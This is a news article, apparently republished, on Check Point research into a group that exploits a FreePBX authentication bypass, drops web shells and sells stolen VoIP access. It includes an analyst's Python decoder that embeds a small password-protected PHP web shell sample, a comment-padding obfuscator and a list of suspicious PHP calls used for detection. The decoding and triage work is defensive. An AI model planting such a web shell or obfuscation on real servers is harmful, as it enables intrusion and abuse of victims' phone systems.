Privacy Ninja

Hackers Stealing And Selling VoIP Access

Chart shows the first level of how an attack transpires. (Source: Check Point Research)

Attackers Exploit a Vulnerability in Asterisk VoIP PBX Servers

Check Point Research has uncovered a large and likely profitable business model that involves hackers attacking and gaining control of certain VoIP services, which enables them to make phone calls through a company’s compromised system.

During the first half of this year, Check Point researchers found the campaign, operated by a hacking group that they believe works from the Palestinian Gaza Strip. The ongoing campaign targets FreePBX, Sangoma's open-source web interface for managing Asterisk, one of the world's most widely deployed VoIP PBX systems.

The threat actors exploit a critically rated vulnerability tracked as CVE-2019-19006 to gain control of companies’ VoIP phone systems to make calls.

“Gaining access to the systems allows the hackers to abuse the servers for their own purposes. CVE-2019-19006 is an authentication bypass vulnerability published in November 2019,” the researchers state in their report. “Check Point Research was able to deduce the vulnerability by examining both the captured attack traffic and Sangoma’s GitHub repository for FreePBX Framework.”

By gaining this level of access to a company's telephone system, the group can sell phone numbers, call plans and live access to compromised VoIP services, the report says.

“They can also use the compromised systems for further attacks, such as using the system resources for cryptomining, spreading laterally across the company network or launching attacks on outside targets while masquerading as the compromised company,” the researchers say.

VoIP attacks have recently been in the news. For example, the security firm ESET uncovered a Linux malware variant dubbed "CDRThief" that targets VoIP softswitches to steal call metadata, such as IP addresses.

Dialing Up the Attack

In the campaign Check Point Research discovered, the attacks start with scans for SIP (Session Initiation Protocol) servers running the vulnerable FreePBX software; the attackers then exploit the flaw to bypass authentication. At that point a web shell is uploaded, and the attack splits into two parts, according to the report.

First, the initial web shell is used to retrieve the contents of Asterisk management files that contain the credentials to the FreePBX system's database and the passwords for the various SIP extensions, effectively handing the attacker full control of the entire system. The threat actor then makes a test phone call to confirm that the system is, in fact, under their control, the researchers note.

Next, the web shell is used to download a base64-encoded PHP file from Pastebin that is padded with garbage comments as an obfuscation method. When the file is decoded, it creates a password-protected web shell that is capable of retrieving the credentials to the Asterisk Internal Database and REST Interface, according to Check Point.
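The second stage described above, a base64-encoded PHP file padded with garbage comments, is a common enough trick that an analyst should be able to unpack it mechanically rather than by hand. The following is an added example, not code from Check Point's report or from the attackers' toolkit: it strips PHP comments from a blob, recovers the longest base64 run, decodes it and flags the decoded script if it combines a password gate with a command-execution primitive. The sample blob and the sample second-stage script are constructed for illustration; the real dropper on Pastebin is not reproduced here.

```python
import base64
import re

# Constructed second-stage script standing in for the decoded web shell the
# report describes (password gate plus command execution). Not the real payload.
SAMPLE_PHP = (
    "<?php\n"
    "if (!isset($_POST['pass']) || $_POST['pass'] !== 'changeme') { die(); }\n"
    "echo shell_exec($_POST['cmd']);\n"
)


def pad_with_comments(b64: str, chunk: int = 24) -> str:
    """Interleave PHP comments between slices of a base64 string. This mimics the
    'garbage comments' obfuscation described above so the decoder can be tested
    offline; it is a constructed imitation, not the attackers' packer."""
    pieces = []
    for i, start in enumerate(range(0, len(b64), chunk)):
        pieces.append(f"/* filler block {i} */")
        pieces.append(b64[start:start + chunk])
        pieces.append(f"  # filler line {i}\n")
    return "".join(pieces)


# The obfuscated blob an analyst would pull from the first-stage shell's download.
SAMPLE_BLOB = pad_with_comments(base64.b64encode(SAMPLE_PHP.encode()).decode())

_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_HASH_COMMENT = re.compile(r"#[^\n]*")
_B64_RUN = re.compile(r"[A-Za-z0-9+/=]+")


def strip_comments(src: str) -> str:
    """Remove /* */ and # comments. '//' is deliberately not handled: a base64
    body can legitimately contain '//', so treating it as a comment marker
    would corrupt the payload."""
    return _HASH_COMMENT.sub("", _BLOCK_COMMENT.sub("", src))


def extract_payload_b64(src: str) -> str:
    """Longest run of base64-alphabet characters once comments and whitespace
    are gone. Junk inside comments is removed; any junk outside comments is
    far shorter than the payload and loses the length contest."""
    compact = re.sub(r"\s+", "", strip_comments(src))
    runs = _B64_RUN.findall(compact)
    if not runs:
        raise ValueError("no base64 run found")
    return max(runs, key=len)


def decode_stage(src: str) -> str:
    b64 = extract_payload_b64(src)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    return base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")


SUSPICIOUS_CALLS = ("eval", "system", "shell_exec", "passthru", "exec",
                    "popen", "proc_open", "assert")
_PASSWORD_GATE = re.compile(
    r"\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*['\"](pass|pw|passwd|password|key|auth)['\"]")


def triage(php: str) -> dict:
    """Summarise what a decoded stage contains. A password gate together with a
    command-execution call is the shape of the protected shell described above."""
    calls = sorted(c for c in SUSPICIOUS_CALLS if re.search(rf"\b{c}\s*\(", php))
    gated = bool(_PASSWORD_GATE.search(php))
    return {"suspicious_calls": calls, "password_gated": gated,
            "likely_webshell": gated and bool(calls)}


if __name__ == "__main__":
    decoded = decode_stage(SAMPLE_BLOB)
    print(decoded)
    print(triage(decoded))
```

The longest-run heuristic is what makes this robust against junk that sits outside comments; if a sample wraps the blob in its own decoder stub, the stub's keywords are separated from the payload by quotes and parentheses and so never join the run. Treat `triage` as a first pass only: a shell that reaches `eval` through string concatenation or `base64_decode` of a further stage will need another round of the same decode-and-inspect loop.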

Social Media Element

In the code, the researchers found several references to Inj3ctor3 and inje3t0r3-seraj, the first of which is the name associated with a Pastebin account that contained the initial web shell upload, the report states.

These names eventually led the Check Point team to several private Facebook groups that deal with VoIP exploitation and, more specifically, SIP server exploitation.

“The group shares a number of tools related to SIP server exploitation: scanners, authentication bypass and remote code execution scripts. Among these scripts, we found a variant of the brute-force script seen in the Pastebin of INJ3CTOR3,” Check Point says.

The Facebook posts contained information that opened several additional avenues for the researchers to explore, leading them to the conclusion that this style of attack is common, particularly in the Middle East.

“Closely examining the profiles of the admins, active users, and carriers seen in the different groups, we found that most of them were from Gaza, the West Bank and Egypt,” the researchers say.

Senior Correspondent Chinmay Rautmare contributed to this report.
